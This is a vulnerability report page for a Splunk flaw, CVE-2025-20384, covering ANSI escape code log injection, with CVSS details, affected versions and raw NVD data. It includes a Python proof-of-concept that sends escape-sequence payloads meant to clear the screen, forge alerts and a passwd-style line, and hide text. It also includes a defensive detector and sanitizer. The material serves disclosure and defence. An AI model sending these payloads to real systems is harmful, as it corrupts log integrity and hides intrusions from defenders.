Security Vulnerability Report
CVE-2025-20384 CVSS 5.3 MEDIUM

CVE-2025-20384

Published: 2025-12-03 17:15:51
Last Modified: 2025-12-05 18:14:08

Description

In Splunk Enterprise versions below 10.0.1, 9.4.6, 9.3.8, and 9.2.10, and Splunk Cloud Platform versions below 10.1.2507.4, 10.0.2503.6, and 9.3.2411.117.125, an unauthenticated attacker can inject American National Standards Institute (ANSI) escape codes into Splunk log files due to improper validation at the /en-US/static/ web endpoint. This may allow them to poison, forge, or obfuscate sensitive log data through specially crafted HTTP requests, potentially impacting log integrity and detection capabilities.

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Weakness: CWE-117 (Improper Output Neutralization for Logs)

Configurations (Affected Products)

cpe:2.3:a:splunk:splunk:*:*:*:*:enterprise:*:*:* (9.2.0 <= version < 9.2.10) - VULNERABLE
cpe:2.3:a:splunk:splunk:*:*:*:*:enterprise:*:*:* (9.3.0 <= version < 9.3.8) - VULNERABLE
cpe:2.3:a:splunk:splunk:*:*:*:*:enterprise:*:*:* (9.4.0 <= version < 9.4.6) - VULNERABLE
cpe:2.3:a:splunk:splunk:10.0.0:*:*:*:enterprise:*:*:* - VULNERABLE
cpe:2.3:a:splunk:splunk_cloud_platform:*:*:*:*:*:*:*:* (9.3.2411 <= version < 9.3.2411.117) - VULNERABLE
cpe:2.3:a:splunk:splunk_cloud_platform:*:*:*:*:*:*:*:* (10.0.2503 <= version < 10.0.2503.6) - VULNERABLE
cpe:2.3:a:splunk:splunk_cloud_platform:*:*:*:*:*:*:*:* (10.1.2507 <= version < 10.1.2507.4) - VULNERABLE
Splunk Enterprise < 9.2.10
Splunk Enterprise < 9.3.8
Splunk Enterprise < 9.4.6
Splunk Enterprise < 10.0.1
Splunk Cloud Platform < 9.3.2411.117.125
Splunk Cloud Platform < 10.0.2503.6
Splunk Cloud Platform < 10.1.2507.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# CVE-2025-20384 ANSI Escape Code Injection PoC
# Target: Splunk Enterprise < 10.0.1, < 9.4.6, < 9.3.8, < 9.2.10
# Target: Splunk Cloud Platform < 10.1.2507.4, < 10.0.2503.6, < 9.3.2411.117.125
# NOTE: the advisory names only the /en-US/static/ endpoint; the "file" query
# parameter used below is this script's own assumption, not documented by the vendor.

target_url = "http://target-splunk.com/en-US/static/"

# ANSI Escape Code payloads
payloads = [
    # Clear screen and inject fake log entry
    "\x1b[2J\x1b[H=== SYSTEM ALERT: ATTACK DETECTED ===",
    # Move cursor and overwrite log line
    "\x1b[10;10HINJECTED LOG ENTRY",
    # Clear line and insert fake authentication success
    "\x1b[2Kadmin:x:0:0:root:/root:/bin/bash",
    # Hide subsequent content
    "\x1b[?25lMalicious Activity Hidden Here",
    # Change text color to hide content
    "\x1b[30mHidden Malicious Command\x1b[0m",
]

for payload in payloads:
    try:
        response = requests.get(
            target_url,
            params={"file": payload},
            timeout=10,
            verify=False,
        )
        print(f"Payload sent: {repr(payload)}")
        print(f"Status: {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"Request failed: {e}")
```
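Defender-side counterpart to the PoC above, added here as an example and not code from the advisory or from Splunk: a detector and sanitizer for the CWE-117 pattern this CVE describes, flagging ANSI escape sequences in log lines and encoding control bytes so a viewer prints rather than interprets them. It goes slightly beyond the ANSI case by also encoding CR/LF (classic log forging); the access-log lines, hosts and paths are constructed, not real Splunk output.

```python
import re

# Recognizes the escape-sequence families that can rewrite or hide terminal output:
# CSI (ESC [ params final), OSC (ESC ] ... BEL or ESC \) and two-byte ESC sequences.
ANSI_RE = re.compile(
    r"\x1b\[[0-?]*[ -/]*[@-~]"             # CSI, e.g. ESC[2J, ESC[10;10H, ESC[?25l
    r"|\x1b\][^\x07\x1b]*(?:\x07|\x1b\\)"  # OSC, e.g. terminal-title changes
    r"|\x1b[@-Z\\-~]"                      # two-byte escapes, e.g. ESC c (full reset)
)
# Every C0 control byte except tab, plus DEL: catches ESC, and also CR/LF used for
# classic log forging, so the sanitizer covers more than the ANSI case alone.
CONTROL_RE = re.compile(r"[\x00-\x08\x0a-\x1f\x7f]")


def find_ansi(line: str) -> list:
    """Return every ANSI escape sequence present in one log line."""
    return ANSI_RE.findall(line)


def neutralize(line: str) -> str:
    """Encode control bytes as visible \\xNN text so a viewer prints rather than
    interprets them; this is the CWE-117 fix applied before data reaches the log."""
    return CONTROL_RE.sub(lambda m: "\\x%02x" % ord(m.group(0)), line)


def scan_log(lines) -> list:
    """Flag lines carrying escape sequences: line number, sequences, neutralized text."""
    findings = []
    for no, line in enumerate(lines, 1):
        seqs = find_ansi(line)
        if seqs:
            findings.append({"line": no, "sequences": seqs, "clean": neutralize(line)})
    return findings


# Constructed web-access style lines (hypothetical hosts and paths, not real Splunk
# output). Line 3 carries a clear-screen plus forged banner, line 4 a colour-hidden token.
SAMPLE_LOG = [
    '10.0.0.5 - - [03/Dec/2025:17:15:51] "GET /en-US/static/app.js HTTP/1.1" 200 512',
    '10.0.0.5 - - [03/Dec/2025:17:15:52] "GET /en-US/static/style.css HTTP/1.1" 200 88',
    '10.0.0.9 - - [03/Dec/2025:17:15:53] "GET /en-US/static/\x1b[2J\x1b[H=== ALERT === HTTP/1.1" 404 0',
    '10.0.0.9 - - [03/Dec/2025:17:15:54] "GET /en-US/static/\x1b[30mhidden\x1b[0m HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']}: {len(f['sequences'])} escape sequence(s) -> {f['clean']}")
```

Running `scan_log` over a Splunk web access log export flags request paths that carry escape sequences, and `neutralize` is the transformation a log writer should apply to untrusted request data before it is written.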

References

https://advisory.splunk.com/advisories/SVD-2025-1203 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-20384", "sourceIdentifier": "[email protected]", "published": "2025-12-03T17:15:50.740", "lastModified": "2025-12-05T18:14:07.767", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In Splunk Enterprise versions below 10.0.1, 9.4.6, 9.3.8, and 9.2.10, and Splunk Cloud Platform versions below 10.1.2507.4, 10.0.2503.6, and 9.3.2411.117.125, an unauthenticated attacker can inject American National Standards Institute (ANSI) escape codes into Splunk log files due to improper validation at the /en-US/static/ web endpoint. This may allow them to poison, forge, or obfuscate sensitive log data through specially crafted HTTP requests, potentially impacting log integrity and detection capabilities."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-117"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "9.2.0", "versionEndExcluding": "9.2.10", "matchCriteriaId": "AE8BF109-2B9C-4C50-AC9F-10A45456FD75"}, {"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "9.3.0", "versionEndExcluding": "9.3.8", "matchCriteriaId": "05D6973D-D965-42D3-8320-AF4A4B424E6C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "9.4.0", 
"versionEndExcluding": "9.4.6", "matchCriteriaId": "8571F470-6AE1-4737-B1FA-49121E426AF2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk:10.0.0:*:*:*:enterprise:*:*:*", "matchCriteriaId": "259A3F4B-E4D2-48BC-9AE9-C37DE94987D5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk_cloud_platform:*:*:*:*:*:*:*:*", "versionStartIncluding": "9.3.2411", "versionEndExcluding": "9.3.2411.117", "matchCriteriaId": "055D722F-3C2C-45FF-B44F-FD73820F2A78"}, {"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk_cloud_platform:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.0.2503", "versionEndExcluding": "10.0.2503.6", "matchCriteriaId": "7BB42067-4A68-44D8-856A-2CC247C440E8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk_cloud_platform:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.1.2507", "versionEndExcluding": "10.1.2507.4", "matchCriteriaId": "93DAD528-22AD-49F4-93AB-5E1AB5D7002B"}]}]}], "references": [{"url": "https://advisory.splunk.com/advisories/SVD-2025-1203", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}